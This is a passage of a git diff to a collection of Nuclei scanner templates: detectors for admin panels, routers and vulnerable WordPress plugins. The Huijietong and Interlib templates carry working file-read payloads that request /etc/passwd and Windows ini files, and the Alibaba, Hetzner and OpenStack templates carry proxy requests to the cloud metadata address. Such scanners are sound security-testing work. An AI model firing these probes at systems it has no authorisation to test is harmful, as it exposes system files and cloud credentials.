+1,32 @@ -id: hp-ilo-5 - -info: - name: Detects Hewlett Packard iLo 5 - author: geeknik - severity: info - reference: - - https://www.hpe.com/us/en/servers/integrated-lights-out-ilo.html - tags: hp,ilo,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/html/login.html" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "titleHeading>iLO 5" - - "titleFwver>Firmware" - - "2002-2018 Hewlett Packard Enterprise Development LP" - condition: and - - - type: word - part: header - words: - - "text/html" +id: hp-ilo-5 + +info: + name: Detects Hewlett Packard iLo 5 + author: geeknik + severity: info + reference: https://www.hpe.com/us/en/servers/integrated-lights-out-ilo.html + tags: hp,ilo,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/html/login.html" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "titleHeading>iLO 5" + - "titleFwver>Firmware" + - "2002-2018 Hewlett Packard Enterprise Development LP" + condition: and + + - type: word + part: header + words: + - "text/html" diff --git a/poc/other/hpe-system-management-anonymous-8011.yaml b/poc/other/hpe-system-management-anonymous-8011.yaml index 13b5e6706b..d7832e0f4b 100644 --- a/poc/other/hpe-system-management-anonymous-8011.yaml +++ b/poc/other/hpe-system-management-anonymous-8011.yaml @@ -1,21 +1,21 @@ -id: hpe-system-management-anonymous-access - -info: - name: HPE System Management Anonymous Access - author: divya_mudgal - severity: low - tags: hp,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/chpstrt.php?chppath=Home" - - matchers-condition: and - matchers: - - type: word - condition: and - words: - - "username = \"hpsmh_anonymous\";" - - "var host_addr = '" +id: hpe-system-management-anonymous-access + +info: + name: HPE System Management Anonymous Access + author: divya_mudgal + severity: low + tags: hp,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/chpstrt.php?chppath=Home" + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - "username = \"hpsmh_anonymous\";" + - "var host_addr = '" - "var ip_addr = '" \ No newline at end of file diff --git a/poc/other/huawei-hg532e-panel-8066.yaml b/poc/other/huawei-hg532e-panel-8066.yaml index 09871c83a9..be8c2de2c8 100644 --- a/poc/other/huawei-hg532e-panel-8066.yaml +++ b/poc/other/huawei-hg532e-panel-8066.yaml @@ -5,11 +5,11 @@ info: author: idealphase severity: info description: The Huawei HG532e router. By default, both the username and password is user + metadata: + shodan-query: http.html:"HG532e" reference: - https://setuprouter.com/router/huawei/hg532e/1194.pdf - https://www.192-168-1-1-ip.co/router/huawei/hg532e/2186/ - metadata: - shodan-query: http.html:"HG532e" tags: huawei,panel requests: diff --git a/poc/other/huawei-home-gateway-8072.yaml b/poc/other/huawei-home-gateway-8072.yaml index e3db239d8c..0593857e61 100644 --- a/poc/other/huawei-home-gateway-8072.yaml +++ b/poc/other/huawei-home-gateway-8072.yaml @@ -1,24 +1,20 @@ id: huawei-home-gateway - info: name: HUAWEI Home Gateway HG658d author: dhiyaneshDK severity: info - tags: iot,huawei metadata: - shodan-query: 'http.title:"HUAWEI Home Gateway HG658d"' - + shodan-query: http.title:"HUAWEI Home Gateway HG658d" + tags: iot,huawei requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word words: - 'HUAWEI Home Gateway HG658d' - - type: status status: - 200 diff --git a/poc/other/huijietong-cloud-fileread-8086.yaml b/poc/other/huijietong-cloud-fileread-8086.yaml index 61a599c6ab..1ab77f4a97 100644 --- a/poc/other/huijietong-cloud-fileread-8086.yaml +++ b/poc/other/huijietong-cloud-fileread-8086.yaml @@ -1,19 +1,33 @@ id: huijietong-cloud-fileread + info: name: Huijietong Cloud File Read - author: princechaddha + author: princechaddha,ritikchaddha severity: high + metadata: + fofa-query: body="/him/api/rest/v1.0/node/role" tags: huijietong,lfi + requests: - method: POST path: - "{{BaseURL}}/fileDownload?action=downloadBackupFile" body: 'fullPath=/etc/passwd' + + - method: POST + path: + - "{{BaseURL}}/fileDownload?action=downloadBackupFile" + body: 'fullPath=/Windows/win.ini' + matchers-condition: and matchers: - type: regex + part: body regex: - - "root:.*:0:0" + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + - type: status status: - 200 diff --git a/poc/other/identity-services-engine-8146.yaml b/poc/other/identity-services-engine-8146.yaml index d3e217f6e5..f593cd3586 100644 --- a/poc/other/identity-services-engine-8146.yaml +++ b/poc/other/identity-services-engine-8146.yaml @@ -4,8 +4,8 @@ info: name: Identity Services Engine author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"Identity Services Engine" + reference: + - https://www.shodan.io/search?query=http.title%3A%22Identity+Services+Engine%22 tags: panel requests: diff --git a/poc/other/improper-logging.yaml b/poc/other/improper-logging.yaml new file mode 100644 index 0000000000..939a27249c --- /dev/null +++ b/poc/other/improper-logging.yaml @@ -0,0 +1,25 @@ +id: improper-logging + +info: + name: Improper Logging + author: YoruYagami + severity: medium + description: | + This template detects improper logging practices in the source code. Logging sensitive information like passwords, API keys, or personal data can expose this information if the logs are accessed by unauthorized parties. + remediation: | + To remediate this issue, ensure that sensitive information is not logged. Use proper logging practices and sanitize logs to prevent sensitive data from being exposed. Example: + + ```java + // Avoid logging sensitive information + Log.d("TAG", "User logged in"); + ``` + +file: + - extensions: + - java + + matchers: + - type: regex + regex: + - "Log\\.(d|i|v|w|e)\\(.*password.*\\)" + - "Log\\.(d|i|v|w|e)\\(.*apikey.*\\)" diff --git a/poc/other/insecure-broadcast-receiver.yaml b/poc/other/insecure-broadcast-receiver.yaml new file mode 100644 index 0000000000..8b6cc231cc --- /dev/null +++ b/poc/other/insecure-broadcast-receiver.yaml @@ -0,0 +1,28 @@ +id: insecure-broadcast-receiver + +info: + name: Insecure Broadcast Receiver + author: YoruYagami + severity: high + description: | + This template detects insecure broadcast receivers that are exported and do not have proper permissions set. This can lead to unauthorized applications sending or receiving broadcasts, leading to potential security issues. + remediation: | + To remediate this issue, ensure that broadcast receivers are not exported unless necessary and that proper permissions are set. Example: + + ```xml + + + + + + ``` + +file: + - extensions: + - xml + + matchers: + - type: word + words: + - " Interactsh Server " - + - "Interactsh Server" + - type: status + status: + - 200 extractors: - type: regex group: 1 regex: - '(.*)<\/b> server' - - 'from (.*)<\/b>' \ No newline at end of file + - 'from (.*)<\/b>' diff --git a/poc/other/interlib-fileread-8174.yaml b/poc/other/interlib-fileread-8174.yaml index ff2833281d..5256916f03 100644 --- a/poc/other/interlib-fileread-8174.yaml +++ b/poc/other/interlib-fileread-8174.yaml @@ -1,27 +1,22 @@ id: interlib-fileread - info: name: Interlib Fileread author: pikpikcu severity: high reference: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6/%E5%9B%BE%E5%88%9B%E8%BD%AF%E4%BB%B6%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E7%AB%99%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md tags: interlib,lfi - requests: - method: GET path: - "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd" - "{{BaseURL}}/interlib/report/ShowImage?localPath=C:\\Windows\\system.ini" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:[x*]:0:0" - "for 16-bit app support" condition: or - - type: status status: - 200 diff --git a/poc/other/jfrog-8306.yaml b/poc/other/jfrog-8306.yaml index 356af6fbf3..6f55f59c98 100644 --- a/poc/other/jfrog-8306.yaml +++ b/poc/other/jfrog-8306.yaml @@ -1,20 +1,31 @@ id: jfrog-login + info: - name: JFrog Login + name: JFrog Login Panel - Detect author: dhiyaneshDK severity: info + description: JFrog login panel was detected. reference: - https://www.exploit-db.com/ghdb/6797 - tags: panel,jfrog -requests: + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: panel,jfrog,edb + +http: - method: GET path: - '{{BaseURL}}/ui/login/' + matchers-condition: and matchers: - type: word words: - 'JFrog' + - type: status status: - 200 +# digest: 4b0a00483046022100bfa95e2d95db535d51023522742e67105a4ca44c2195a7bcae99ff18a8a3e215022100cc08d7c15e5b503a664ce40eeeb750549e654f290a8266192954330d210549ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/kerio-connect-client-8452.yaml b/poc/other/kerio-connect-client-8452.yaml index 0e541dd6ec..b4c0aa48a7 100644 --- a/poc/other/kerio-connect-client-8452.yaml +++ b/poc/other/kerio-connect-client-8452.yaml @@ -1,4 +1,5 @@ id: kerio-connect-client + info: name: Kerio Connect Client author: dhiyaneshDk @@ -6,16 +7,19 @@ info: metadata: shodan-query: http.title:"Kerio Connect Client" tags: panel,kerio + requests: - method: GET path: - "{{BaseURL}}/webmail/login/" + matchers-condition: and matchers: - type: word part: body words: - "Kerio Connect Client" + - type: status status: - 200 diff --git a/poc/other/kubelet-healthz-8518.yaml b/poc/other/kubelet-healthz-8518.yaml index 54b5046fcb..89f00822ff 100644 --- a/poc/other/kubelet-healthz-8518.yaml +++ b/poc/other/kubelet-healthz-8518.yaml @@ -1,28 +1,34 @@ id: kubelet-healthz + info: name: Kubelet Healthz author: sharath severity: info description: Scans for kubelet healthz tags: tech,k8s,kubernetes,devops,kubelet + requests: - method: GET path: - "{{BaseURL}}/healthz" + matchers-condition: and matchers: - type: status status: - 200 + - type: regex part: header regex: - "text/plain" + - type: word part: body words: - "ok" + - type: word part: header words: - - "Kubernetes" + - "Kubernetes" \ No newline at end of file diff --git a/poc/other/lancom-router-panel-8564.yaml b/poc/other/lancom-router-panel-8564.yaml index 5e2b83983e..9e15b91dda 100644 --- a/poc/other/lancom-router-panel-8564.yaml +++ b/poc/other/lancom-router-panel-8564.yaml @@ -1,18 +1,22 @@ id: lancom-router-panel + info: name: Lancom Router Panel author: __Fazal severity: info tags: panel,lancom,router + requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "LANCOM 1790VA-4G" diff --git a/poc/other/lawyer-landing-page.yaml b/poc/other/lawyer-landing-page.yaml new file mode 100644 index 0000000000..2c28399252 --- /dev/null +++ b/poc/other/lawyer-landing-page.yaml @@ -0,0 +1,59 @@ +id: lawyer-landing-page + +info: + name: > + Lawyer Landing Page <= 1.2.4 - Cross-Site Request Forgery to Notice Dismissal + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ab382c09-667b-42b9-b373-834a5f5ae9e2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/lawyer-landing-page/" + google-query: inurl:"/wp-content/themes/lawyer-landing-page/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,lawyer-landing-page,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/lawyer-landing-page/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "lawyer-landing-page" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.4') \ No newline at end of file diff --git a/poc/other/link-to-bible.yaml b/poc/other/link-to-bible.yaml new file mode 100644 index 0000000000..5ea06027c1 --- /dev/null +++ b/poc/other/link-to-bible.yaml @@ -0,0 +1,59 @@ +id: link-to-bible + +info: + name: > + Link To Bible <= 2.5.9 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8ec9b8f4-0531-4d3b-8416-ba6dd41a3bac?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/link-to-bible/" + google-query: inurl:"/wp-content/plugins/link-to-bible/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,link-to-bible,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/link-to-bible/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "link-to-bible" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.9') \ No newline at end of file diff --git a/poc/other/lucee-stack-trace-8669.yaml b/poc/other/lucee-stack-trace-8669.yaml index 6ef787966a..af0c2a674a 100644 --- a/poc/other/lucee-stack-trace-8669.yaml +++ b/poc/other/lucee-stack-trace-8669.yaml @@ -3,7 +3,8 @@ info: name: Lucee Stack Trace Error author: dhiyaneshDK severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Lucee%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22Lucee%22 tags: lucee,exposure requests: - method: GET diff --git a/poc/other/manage-engine-admanager-panel-8731.yaml b/poc/other/manage-engine-admanager-panel-8731.yaml index ba64f8b594..62ca19c347 100644 --- a/poc/other/manage-engine-admanager-panel-8731.yaml +++ b/poc/other/manage-engine-admanager-panel-8731.yaml @@ -1,9 +1,11 @@ id: manage-engine-admanager-panel + info: name: Manage Engine ADManager Panel author: PR3R00T severity: info tags: panel + requests: - method: GET path: diff --git a/poc/other/manageengine-adselfservice-8738.yaml b/poc/other/manageengine-adselfservice-8738.yaml index 761d78ed62..fb66eddfd7 100644 --- a/poc/other/manageengine-adselfservice-8738.yaml +++ b/poc/other/manageengine-adselfservice-8738.yaml @@ -1,19 +1,24 @@ id: manageengine-adselfservice + info: name: ZOHO ManageEngine ADSelfService Plus author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22ADSelfService+Plus%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22ADSelfService+Plus%22 tags: panel,zoho,manageengine + requests: - method: GET path: - '{{BaseURL}}/authorization.do' + matchers-condition: and matchers: - type: word words: - 'ADSelfService Plus' + - type: status status: - 200 diff --git a/poc/other/manageengine-analytics-8742.yaml b/poc/other/manageengine-analytics-8742.yaml index 761a398691..51b2b71d92 100644 --- a/poc/other/manageengine-analytics-8742.yaml +++ b/poc/other/manageengine-analytics-8742.yaml @@ -1,24 +1,19 @@ id: manageengine-analytics - info: name: ZOHO ManageEngine Analytics Plus author: dhiyaneshDK severity: info - reference: - - https://fofa.so/result?qbase64=YXBwPSJaT0hPLea1gemHj%2BeuoeeQhiI%3D + reference: https://fofa.so/result?qbase64=YXBwPSJaT0hPLea1gemHj%2BeuoeeQhiI%3D tags: panel,zoho,manageengine - requests: - method: GET path: - '{{BaseURL}}/iam/login' - matchers-condition: and matchers: - type: word words: - 'ManageEngine Analytics Plus' - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/other/manageengine-applications-manager-8753.yaml b/poc/other/manageengine-applications-manager-8753.yaml index 2852000b77..b7a23b4350 100644 --- a/poc/other/manageengine-applications-manager-8753.yaml +++ b/poc/other/manageengine-applications-manager-8753.yaml @@ -1,19 +1,22 @@ id: manageengine-applications-manager + info: name: ZOHO ManageEngine Applications Manager author: dhiyaneshDK severity: info - reference: https://fofa.so/result?qbase64=YXBwPSJaT0hPLU1hbmFnZUVuZ2luZS1BcHBsaWNhdGlvbnMtTWFuYWdlciI%3D tags: panel,zoho,manageengine + requests: - method: GET path: - '{{BaseURL}}/index.do' + matchers-condition: and matchers: - type: word words: - 'Applications Manager Login Screen' + - type: status status: - 200 diff --git a/poc/other/manageengine-assetexplorer-8756.yaml b/poc/other/manageengine-assetexplorer-8756.yaml index 5624722829..8733b452df 100644 --- a/poc/other/manageengine-assetexplorer-8756.yaml +++ b/poc/other/manageengine-assetexplorer-8756.yaml @@ -1,20 +1,24 @@ id: manageengine-assetexplorer + info: name: ZOHO ManageEngine AssetExplorer author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+AssetExplorer%22 + metadata: + shodan-query: http.title:"ManageEngine AssetExplorer" tags: panel,zoho,manageengine + requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word words: - 'ManageEngine AssetExplorer' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/manageengine-opmanager-8768.yaml b/poc/other/manageengine-opmanager-8768.yaml index 007b925120..4b98408a0d 100644 --- a/poc/other/manageengine-opmanager-8768.yaml +++ b/poc/other/manageengine-opmanager-8768.yaml @@ -1,5 +1,4 @@ id: manageengine-opmanager - info: name: ZOHO ManageEngine OpManager author: dhiyaneshDK,daffainfo @@ -9,12 +8,10 @@ info: metadata: shodan-query: http.title:"OpManager Plus" tags: panel,zoho,manageengine - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word @@ -24,7 +21,6 @@ requests: - "
" - "
" condition: and - - type: status status: - 200 diff --git a/poc/other/manageengine-supportcenter-8775.yaml b/poc/other/manageengine-supportcenter-8775.yaml index 6dbba32ff9..4be85998b0 100644 --- a/poc/other/manageengine-supportcenter-8775.yaml +++ b/poc/other/manageengine-supportcenter-8775.yaml @@ -1,4 +1,5 @@ id: manageengine-supportcenter + info: name: ZOHO ManageEngine SupportCenter author: dhiyaneshDK @@ -6,15 +7,18 @@ info: reference: - https://www.shodan.io/search?query=http.title%3A%22ManageEngine+SupportCenter+Plus%22 tags: panel,zoho,manageengine + requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word words: - 'ManageEngine SupportCenter Plus' + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/other/meeting-scheduler-by-vcita-84ac44ede425ec37bd9dd01a4768765b.yaml b/poc/other/meeting-scheduler-by-vcita-84ac44ede425ec37bd9dd01a4768765b.yaml new file mode 100644 index 0000000000..84ee3e2720 --- /dev/null +++ b/poc/other/meeting-scheduler-by-vcita-84ac44ede425ec37bd9dd01a4768765b.yaml @@ -0,0 +1,59 @@ +id: meeting-scheduler-by-vcita-84ac44ede425ec37bd9dd01a4768765b + +info: + name: > + Online Booking & Scheduling Calendar for WordPress by vcita <= 4.4.2 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c648aace-93d9-46c9-bf10-80286c81422c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/" + google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "meeting-scheduler-by-vcita" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.4.2') \ No newline at end of file diff --git a/poc/other/meks-easy-ads-widget-51c521863e7a2b8e466469eb2a37108c.yaml b/poc/other/meks-easy-ads-widget-51c521863e7a2b8e466469eb2a37108c.yaml new file mode 100644 index 0000000000..c5c2bda7ae --- /dev/null +++ b/poc/other/meks-easy-ads-widget-51c521863e7a2b8e466469eb2a37108c.yaml @@ -0,0 +1,59 @@ +id: meks-easy-ads-widget-51c521863e7a2b8e466469eb2a37108c + +info: + name: > + Meks Easy Ads Widget <= 2.0.8 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14ae1f7a-be81-4f4f-8cea-7afb824186aa?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/meks-easy-ads-widget/" + google-query: inurl:"/wp-content/plugins/meks-easy-ads-widget/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,meks-easy-ads-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/meks-easy-ads-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "meks-easy-ads-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.8') \ No newline at end of file diff --git a/poc/other/metadata-alibaba-8809.yaml b/poc/other/metadata-alibaba-8809.yaml index 7a71541371..d7ffe67c09 100644 --- a/poc/other/metadata-alibaba-8809.yaml +++ b/poc/other/metadata-alibaba-8809.yaml @@ -1,26 +1,29 @@ id: metadata-service-alibaba + # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. + info: name: Alibaba Metadata Service Check author: sullo severity: critical description: The Alibaba host is configured as a proxy which allows access to the metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://www.alibabacloud.com/help/doc-detail/108460.htm - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ - tags: exposure,config,alibaba,proxy,misconfig,metadata classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + tags: exposure,config,alibaba,proxy,misconfig,metadata + requests: - raw: - |+ @@ -37,3 +40,5 @@ requests: part: body words: - "zone-id" + +# Enhanced by mp on 2022/04/22 diff --git a/poc/other/metadata-hetzner-8824.yaml b/poc/other/metadata-hetzner-8824.yaml index dcd2833b54..34ff8c6780 100644 --- a/poc/other/metadata-hetzner-8824.yaml +++ b/poc/other/metadata-hetzner-8824.yaml @@ -1,8 +1,8 @@ id: metadata-service-hetzner # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. @@ -11,7 +11,7 @@ info: author: sullo severity: critical description: The Hetzner Cloud host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.hetzner.cloud/#server-metadata - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -23,10 +23,9 @@ info: cwe-id: CWE-441 requests: - raw: - - |+ + - | GET http://{{hostval}}/v1/metadata/private-networks HTTP/1.1 Host: {{hostval}} - payloads: hostval: - aws.interact.sh @@ -40,3 +39,4 @@ requests: - "local-ipv4:" - "instance-id:" condition: or +# Enhanced by cs on 2022/02/14 diff --git a/poc/other/metadata-openstack-8826.yaml b/poc/other/metadata-openstack-8826.yaml index 7595ed67b6..6e215902a5 100644 --- a/poc/other/metadata-openstack-8826.yaml +++ b/poc/other/metadata-openstack-8826.yaml @@ -2,9 +2,9 @@ id: metadata-service-openstack # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfill to its -# own metadata service. - +# the proxy using the full metadata URL, which the proxy will fulfull to its +# own metadata sevice. +# # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. @@ -13,30 +13,27 @@ info: author: sullo severity: critical description: The Openstack host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://docs.openstack.org/nova/latest/admin/metadata-service.html - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ - https://www.mcafee.com/blogs/enterprise/cloud-security/how-an-attacker-could-use-instance-metadata-to-breach-your-app-in-aws/ tags: exposure,config,openstack,proxy,misconfig,metadata - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N - cvss-score: 9.3 - cwe-id: CWE-441 + requests: - raw: - |+ GET http://{{hostval}}/openstack/latest HTTP/1.1 Host: {{hostval}} + payloads: hostval: - aws.interact.sh - 169.254.169.254 + unsafe: true matchers: - type: word part: body words: - "vendor_data.json" - -# Enhanced by cs on 2022/02/28 diff --git a/poc/other/metro-magazine.yaml b/poc/other/metro-magazine.yaml new file mode 100644 index 0000000000..4818cbd593 --- /dev/null +++ b/poc/other/metro-magazine.yaml @@ -0,0 +1,59 @@ +id: metro-magazine + +info: + name: > + themedropbox Themes <= Various Versions - Missing Authorization to Notice Dismissal + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ba3c70a-967f-4dc9-aaac-d13b11eb4711?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/metro-magazine/" + google-query: inurl:"/wp-content/themes/metro-magazine/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,metro-magazine,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/metro-magazine/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "metro-magazine" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.7') \ No newline at end of file diff --git a/poc/other/mikrotik-routeros-8875.yaml b/poc/other/mikrotik-routeros-8875.yaml index 878d13146a..93481765df 100644 --- a/poc/other/mikrotik-routeros-8875.yaml +++ b/poc/other/mikrotik-routeros-8875.yaml @@ -1,15 +1,17 @@ id: mikrotik-routeros + info: name: MikroTik RouterOS Login author: gy741 severity: info - reference: - - https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe + reference: https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe tags: panel,login + requests: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word diff --git a/poc/other/mobotix-guest-camera-8910.yaml b/poc/other/mobotix-guest-camera-8910.yaml index 066894c287..18cba181d9 100644 --- a/poc/other/mobotix-guest-camera-8910.yaml +++ b/poc/other/mobotix-guest-camera-8910.yaml @@ -1,10 +1,13 @@ id: mobotix-guest-camera + info: name: MOBOTIX Guest Camera author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6848 + reference: + - https://www.exploit-db.com/ghdb/6848 tags: iot + requests: - method: GET path: diff --git a/poc/other/neos-panel-9016.yaml b/poc/other/neos-panel-9016.yaml index 48cfee73a4..2a693580e7 100644 --- a/poc/other/neos-panel-9016.yaml +++ b/poc/other/neos-panel-9016.yaml @@ -1,4 +1,5 @@ id: neos-panel + info: name: Neos CMS Login Panel author: k11h-de @@ -7,10 +8,12 @@ info: reference: - https://github.com/neos/neos/blob/master/Configuration/Routes.yaml tags: panel,neos,cms,login + requests: - method: GET path: - '{{BaseURL}}/neos/login' + redirects: true max-redirects: 2 matchers-condition: and @@ -18,9 +21,11 @@ requests: - type: word words: - 'Neos comes with ABSOLUTELY NO WARRANTY' + - type: status status: - 200 + extractors: - type: kval kval: diff --git a/poc/other/nessus-panel-9019.yaml b/poc/other/nessus-panel-9019.yaml index 8347c49d41..b62d082ea5 100644 --- a/poc/other/nessus-panel-9019.yaml +++ b/poc/other/nessus-panel-9019.yaml @@ -1,28 +1,23 @@ id: nessus-panel-detect - info: name: Nessus Panel detector author: joanbono severity: info tags: panel - requests: - method: GET path: - "{{BaseURL}}/server/status" - matchers-condition: and matchers: - type: word words: - '{"code":200,"progress":null,"status":"ready"}' part: body - - type: word words: - 'NessusWWW' part: header - - type: status status: - 200 diff --git a/poc/other/netflix-conductor-ui-9023.yaml b/poc/other/netflix-conductor-ui-9023.yaml index 